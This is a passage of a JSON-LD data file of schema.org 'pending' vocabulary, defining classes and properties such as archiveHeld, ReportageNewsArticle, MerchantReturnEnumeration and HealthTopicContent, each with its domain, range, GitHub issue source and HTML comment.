"http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Indicates the relationship type of a Web link.", "rdfs:label": "linkRelationship" }, { "@id": "http://schema.org/archiveHeld", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1758" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1758" }, "http://schema.org/domainIncludes": { "@id": "http://schema.org/ArchiveOrganization" }, "http://schema.org/inverseOf": { "@id": "http://schema.org/holdingArchive" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/ArchiveComponent" }, "rdfs:comment": "Collection, <a href=\"https://en.wikipedia.org/wiki/Fonds\">fonds</a>, or item held, kept or maintained by an <a class=\"localLink\" href=\"http://schema.org/ArchiveOrganization\">ArchiveOrganization</a>.", "rdfs:label": { "@language": "en", "@value": "archiveHeld" } }, { "@id": "http://schema.org/numberOfAvailableAccommodationUnits", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/ApartmentComplex" }, { "@id": "http://schema.org/FloorPlan" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/QuantitativeValue" }, "rdfs:comment": "Indicates the number of available accommodation units in an <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a>, or the number of accommodation units for a specific <a class=\"localLink\" href=\"http://schema.org/FloorPlan\">FloorPlan</a> (within its specific <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a>). See also <a class=\"localLink\" href=\"http://schema.org/numberOfAccommodationUnits\">numberOfAccommodationUnits</a>.", "rdfs:label": "numberOfAvailableAccommodationUnits" }, { "@id": "http://schema.org/ReportageNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "The <a class=\"localLink\" href=\"http://schema.org/ReportageNewsArticle\">ReportageNewsArticle</a> type is a subtype of <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> representing\n news articles which are the result of journalistic news reporting conventions.<br/><br/>\n\nIn practice many news publishers produce a wide variety of article types, many of which might be considered a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> but not a <a class=\"localLink\" href=\"http://schema.org/ReportageNewsArticle\">ReportageNewsArticle</a>. For example, opinion pieces, reviews, analysis, sponsored or satirical articles, or articles that combine several of these elements.<br/><br/>\n\nThe <a class=\"localLink\" href=\"http://schema.org/ReportageNewsArticle\">ReportageNewsArticle</a> type is based on a stricter ideal for \"news\" as a work of journalism, with articles based on factual information either observed or verified by the author, or reported and verified from knowledgeable sources. This often includes perspectives from multiple viewpoints on a particular issue (distinguishing news reports from public relations or propaganda). News reports in the <a class=\"localLink\" href=\"http://schema.org/ReportageNewsArticle\">ReportageNewsArticle</a> sense de-emphasize the opinion of the author, with commentary and value judgements typically expressed elsewhere.<br/><br/>\n\nA <a class=\"localLink\" href=\"http://schema.org/ReportageNewsArticle\">ReportageNewsArticle</a> which goes deeper into analysis can also be marked with an additional type of <a class=\"localLink\" href=\"http://schema.org/AnalysisNewsArticle\">AnalysisNewsArticle</a>.", "rdfs:label": "ReportageNewsArticle", "rdfs:subClassOf": { "@id": "http://schema.org/NewsArticle" } }, { "@id": "http://schema.org/accountMinimumInflow", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/BankAccount" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "A minimum amount that has to be paid in every month.", "rdfs:label": "accountMinimumInflow" }, { "@id": "http://schema.org/CriticReview", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1589" }, "http://schema.org/category": "issue-1589", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/CriticReview\">CriticReview</a> is a more specialized form of Review written or published by a source that is recognized for its reviewing activities. These can include online columns, travel and food guides, TV and radio shows, blogs and other independent Web sites. <a class=\"localLink\" href=\"http://schema.org/CriticReview\">CriticReview</a>s are typically more in-depth and professionally written. For simpler, casually written user/visitor/viewer/customer reviews, it is more appropriate to use the <a class=\"localLink\" href=\"http://schema.org/UserReview\">UserReview</a> type. Review aggregator sites such as Metacritic already separate out the site's user reviews from selected critic reviews that originate from third-party sources.", "rdfs:label": "CriticReview", "rdfs:subClassOf": { "@id": "http://schema.org/Review" } }, { "@id": "http://schema.org/byDay", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DayOfWeek" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Defines the day(s) of the week on which a recurring <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> takes place. May be specified using either <a class=\"localLink\" href=\"http://schema.org/DayOfWeek\">DayOfWeek</a>, or alternatively <a class=\"localLink\" href=\"http://schema.org/Text\">Text</a> conforming to iCal's syntax for byDay recurrence rules", "rdfs:label": "byDay" }, { "@id": "http://schema.org/ArchiveOrganization", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1758" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1758" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An organization with archival holdings. An organization which keeps and preserves archival material and typically makes it accessible to the public.", "rdfs:label": { "@language": "en", "@value": "ArchiveOrganization" }, "rdfs:subClassOf": { "@id": "http://schema.org/LocalBusiness" } }, { "@id": "http://schema.org/PronounceableText", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2108" }, "http://schema.org/category": "issue-2108", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Data type: PronounceableText.", "rdfs:label": "PronounceableText", "rdfs:subClassOf": { "@id": "http://schema.org/Text" } }, { "@id": "http://schema.org/healthPlanDrugOption", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "TODO.", "rdfs:label": "healthPlanDrugOption" }, { "@id": "http://schema.org/inStoreReturnsOffered", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Are in-store returns offered?", "rdfs:label": "inStoreReturnsOffered" }, { "@id": "http://schema.org/numberOfPartialBathrooms", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/FloorPlan" }, { "@id": "http://schema.org/Accommodation" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "Number of partial bathrooms - The total number of half and ¼ bathrooms in an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>. This corresponds to the <a href=\"https://ddwiki.reso.org/display/DDW17/BathroomsPartial+Field\">BathroomsPartial field in RESO</a>.", "rdfs:label": "numberOfPartialBathrooms" }, { "@id": "http://schema.org/InForce", "@type": "http://schema.org/LegalForceStatus", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#InForce-inForce" }, "rdfs:comment": "Indicates that a legislation is in force.", "rdfs:label": "InForce" }, { "@id": "http://schema.org/measurementTechnique", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1425" }, "http://schema.org/category": "issue-1425", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Dataset" }, { "@id": "http://schema.org/DataDownload" }, { "@id": "http://schema.org/PropertyValue" }, { "@id": "http://schema.org/DataCatalog" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "A technique or technology used in a <a class=\"localLink\" href=\"http://schema.org/Dataset\">Dataset</a> (or <a class=\"localLink\" href=\"http://schema.org/DataDownload\">DataDownload</a>, <a class=\"localLink\" href=\"http://schema.org/DataCatalog\">DataCatalog</a>),\ncorresponding to the method used for measuring the corresponding variable(s) (described using <a class=\"localLink\" href=\"http://schema.org/variableMeasured\">variableMeasured</a>). This is oriented towards scientific and scholarly dataset publication but may have broader applicability; it is not intended as a full representation of measurement, but rather as a high level summary for dataset discovery.<br/><br/>\n\nFor example, if <a class=\"localLink\" href=\"http://schema.org/variableMeasured\">variableMeasured</a> is: molecule concentration, <a class=\"localLink\" href=\"http://schema.org/measurementTechnique\">measurementTechnique</a> could be: \"mass spectrometry\" or \"nmr spectroscopy\" or \"colorimetry\" or \"immunofluorescence\".<br/><br/>\n\nIf the <a class=\"localLink\" href=\"http://schema.org/variableMeasured\">variableMeasured</a> is \"depression rating\", the <a class=\"localLink\" href=\"http://schema.org/measurementTechnique\">measurementTechnique</a> could be \"Zung Scale\" or \"HAM-D\" or \"Beck Depression Inventory\".<br/><br/>\n\nIf there are several <a class=\"localLink\" href=\"http://schema.org/variableMeasured\">variableMeasured</a> properties recorded for some given data object, use a <a class=\"localLink\" href=\"http://schema.org/PropertyValue\">PropertyValue</a> for each <a class=\"localLink\" href=\"http://schema.org/variableMeasured\">variableMeasured</a> and attach the corresponding <a class=\"localLink\" href=\"http://schema.org/measurementTechnique\">measurementTechnique</a>.", "rdfs:label": "measurementTechnique" }, { "@id": "http://schema.org/Consortium", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1559" }, "http://schema.org/category": "issue-1559", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A Consortium is a membership <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> whose members are typically Organizations.", "rdfs:label": "Consortium", "rdfs:subClassOf": { "@id": "http://schema.org/Organization" } }, { "@id": "http://schema.org/CategoryCode", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A Category Code.", "rdfs:label": "CategoryCode", "rdfs:subClassOf": { "@id": "http://schema.org/DefinedTerm" } }, { "@id": "http://schema.org/TouristTrip", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#IIT-CNR.it" } ], "http://schema.org/category": "issue-1810", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A tourist trip. A created itinerary of visits to one or more places of interest (<a class=\"localLink\" href=\"http://schema.org/TouristAttraction\">TouristAttraction</a>/<a class=\"localLink\" href=\"http://schema.org/TouristDestination\">TouristDestination</a>) often linked by a similar theme, geographic area, or interest to a particular <a class=\"localLink\" href=\"http://schema.org/touristType\">touristType</a>. The <a href=\"http://www2.unwto.org/\">UNWTO</a> defines tourism trip as the Trip taken by visitors.\n (See examples below).", "rdfs:label": "TouristTrip", "rdfs:subClassOf": { "@id": "http://schema.org/Trip" } }, { "@id": "http://schema.org/applicantLocationRequirements", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2083" }, "http://schema.org/category": "issue-2083", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/AdministrativeArea" }, "rdfs:comment": "The location(s) applicants can apply from. This is usually used for telecommuting jobs where the applicant does not need to be in a physical office. Note: This should not be used for citizenship or work visa requirements.", "rdfs:label": "applicantLocationRequirements" }, { "@id": "http://schema.org/returnFees", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/ReturnFeesEnumeration" }, "rdfs:comment": "Indicates (via enumerated options) the return fees policy for a MerchantReturnPolicy", "rdfs:label": "returnFees" }, { "@id": "http://schema.org/legislationType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/CategoryCode" } ], "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#type_document" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#type_document" }, "rdfs:comment": "The type of the legislation. Examples of values are \"law\", \"act\", \"directive\", \"decree\", \"regulation\", \"statutory instrument\", \"loi organique\", \"règlement grand-ducal\", etc., depending on the country.", "rdfs:label": "legislationType", "rdfs:subPropertyOf": { "@id": "http://schema.org/genre" } }, { "@id": "http://schema.org/firstAppearance", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1828" }, "http://schema.org/category": "issue-1828", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Claim" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/CreativeWork" }, "rdfs:comment": "Indicates the first known occurence of a <a class=\"localLink\" href=\"http://schema.org/Claim\">Claim</a> in some <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>.", "rdfs:label": "firstAppearance", "rdfs:subPropertyOf": { "@id": "http://schema.org/workExample" } }, { "@id": "http://schema.org/ExchangeRateSpecification", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A structured value representing exchange rate.", "rdfs:label": "ExchangeRateSpecification", "rdfs:subClassOf": { "@id": "http://schema.org/StructuredValue" } }, { "@id": "http://schema.org/isResizable", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2394" }, "http://schema.org/category": "issue-2394", "http://schema.org/domainIncludes": { "@id": "http://schema.org/3DModel" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether the 3DModel allows resizing. For example, room layout applications often do not allow 3DModel elements to be resized to reflect reality.", "rdfs:label": "isResizable" }, { "@id": "http://schema.org/MerchantReturnEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MerchantReturnEnumeration enumerates several kinds of product return policy. Note that this structure may not capture all aspects of the policy.", "rdfs:label": "MerchantReturnEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/FullRefund", "@type": "http://schema.org/RefundTypeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A FullRefund ...", "rdfs:label": "FullRefund" }, { "@id": "http://schema.org/educationalLevel", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, "http://schema.org/category": "issue-1779", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalCredential" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/DefinedTerm" } ], "rdfs:comment": "The level in terms of progression through an educational or training context. Examples of educational levels include 'beginner', 'intermediate' or 'advanced', and formal sets of level indicators.", "rdfs:label": "educationalLevel" }, { "@id": "http://schema.org/yearBuilt", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Accommodation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "The year an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a> was constructed. This corresponds to the <a href=\"https://ddwiki.reso.org/display/DDW17/YearBuilt+Field\">YearBuilt field in RESO</a>.", "rdfs:label": "yearBuilt" }, { "@id": "http://schema.org/maximumEnrollment", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The maximum number of students who may be enrolled in the program.", "rdfs:label": "maximumEnrollment" }, { "@id": "http://schema.org/financialAidEligible", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2418" }, "http://schema.org/category": "issue-2418", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/DefinedTerm" } ], "rdfs:comment": "A financial aid type or program which students may use to pay for tuition or fees associated with the program.", "rdfs:label": "financialAidEligible" }, { "@id": "http://schema.org/exchangeRateSpread", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/ExchangeRateSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Number" }, { "@id": "http://schema.org/MonetaryAmount" } ], "rdfs:comment": "The difference between the price at which a broker or other intermediary buys and sells foreign currency.", "rdfs:label": "exchangeRateSpread" }, { "@id": "http://schema.org/Play", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1816" }, "http://schema.org/category": "issue-1816", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A play is a form of literature, usually consisting of dialogue between characters, intended for theatrical performance rather than just reading. Note the peformance of a Play would be a <a class=\"localLink\" href=\"http://schema.org/TheaterEvent\">TheaterEvent</a> - the <em>Play</em> being the <a class=\"localLink\" href=\"http://schema.org/workPerformed\">workPerformed</a>.", "rdfs:label": "Play", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/broadcastSignalModulation", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2111" }, "http://schema.org/category": "issue-2111", "http://schema.org/domainIncludes": { "@id": "http://schema.org/BroadcastFrequencySpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/QualitativeValue" } ], "rdfs:comment": "The modulation (e.g. FM, AM, etc) used by a particular broadcast service", "rdfs:label": "broadcastSignalModulation" }, { "@id": "http://schema.org/ScreeningHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about how to screen or further filter a topic.", "rdfs:label": "ScreeningHealthAspect" }, { "@id": "http://schema.org/LinkRole", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1045" }, "http://schema.org/category": "issue-1045", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A Role that represents a Web link e.g. as expressed via the 'url' property. Its linkRelationship property can indicate URL-based and plain textual link types e.g. those in IANA link registry or others such as 'amphtml'. This structure provides a placeholder where details from HTML's link element can be represented outside of HTML, e.g. in JSON-LD feeds.", "rdfs:label": "LinkRole", "rdfs:subClassOf": { "@id": "http://schema.org/Role" } }, { "@id": "http://schema.org/credentialCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, "http://schema.org/category": "issue-1779", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalCredential" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTerm" }, { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The category or type of credential being described, for example \"degree”, “certificate”, “badge”, or more specific term.", "rdfs:label": "credentialCategory" }, { "@id": "http://schema.org/HealthTopicContent", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "<a class=\"localLink\" href=\"http://schema.org/HealthTopicContent\">HealthTopicContent</a> is <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a> that is about some aspect of a health topic, e.g. a condition, its symptoms or treatments. Such content may be comprised of several parts or sections and use different types of media. Multiple instances of <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a> (and hence <a class=\"localLink\" href=\"http://schema.org/HealthTopicContent\">HealthTopicContent</a>) can be related using <a class=\"localLink\" href=\"http://schema.org/hasPart\">hasPart</a> / <a class=\"localLink\" href=\"http://schema.org/isPartOf\">isPartOf</a> where there is some kind of content hierarchy, and their content described with <a class=\"localLink\" href=\"http://schema.org/about\">about</a> and <a class=\"localLink\" href=\"http://schema.org/mentions\">mentions</a> e.g. building upon the existing <a class=\"localLink\" href=\"http://schema.org/MedicalCondition\">MedicalCondition</a> vocabulary.", "rdfs:label": "HealthTopicContent", "rdfs:subClassOf": { "@id": "http://schema.org/WebContent" } }, { "@id": "http://schema.org/VirtualLocation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An online or virtual location for attending events. For example, one may attend an online seminar or educational event. While a virtual location may be used as the location of an event, virtual locations should not be confused with physical locations in the real world.", "rdfs:label": "VirtualLocation", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/MoneyTransfer", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "The act of transferring money from one place to another place. This may occur electronically or physically.", "rdfs:label": "MoneyTransfer", "rdfs:subClassOf": { "@id": "http://schema.org/TransferAction" } }, { "@id": "http://schema.org/maximumVirtualAttendeeCapacity", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Event" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The maximum physical attendee capacity of an <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> whose <a class=\"localLink\" href=\"http://schema.org/eventAttendanceMode\">eventAttendanceMode</a> is <a class=\"localLink\" href=\"http://schema.org/OnlineEventAttendanceMode\">OnlineEventAttendanceMode</a> (or the online aspects, in the case of a <a class=\"localLink\" href=\"http://schema.org/MixedEventAttendanceMode\">MixedEventAttendanceMode</a>).", "rdfs:label": "maximumVirtualAttendeeCapacity" }, { "@id": "http://schema.org/OfferForPurchase", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2348" }, "http://schema.org/category": "issue-2348", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/OfferForPurchase\">OfferForPurchase</a> in Schema.org represents an <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a> to sell something, i.e. an <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a> whose\n <a class=\"localLink\" href=\"http://schema.org/businessFunction\">businessFunction</a> is <a href=\"http://purl.org/goodrelations/v1#Sell.\">sell</a>. See <a href=\"https://en.wikipedia.org/wiki/GoodRelations\">Good Relations</a> for\n background on the underlying concepts.", "rdfs:label": "OfferForPurchase", "rdfs:subClassOf": { "@id": "http://schema.org/Offer" } }, { "@id": "http://schema.org/termsOfService", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1423" }, "http://schema.org/category": "issue-1423", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Service" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Human-readable terms of service documentation.", "rdfs:label": "termsOfService" }, { "@id": "http://schema.org/StoreCreditRefund", "@type": "http://schema.org/RefundTypeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A StoreCreditRefund ...", "rdfs:label": "StoreCreditRefund" }, { "@id": "http://schema.org/CategoryCodeSet", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A set of Category Code values.", "rdfs:label": "CategoryCodeSet", "rdfs:subClassOf": { "@id": "http://schema.org/DefinedTermSet" } }, { "@id": "http://schema.org/jobImmediateStart", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2244" }, "http://schema.org/category": "issue-2244", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "An indicator as to 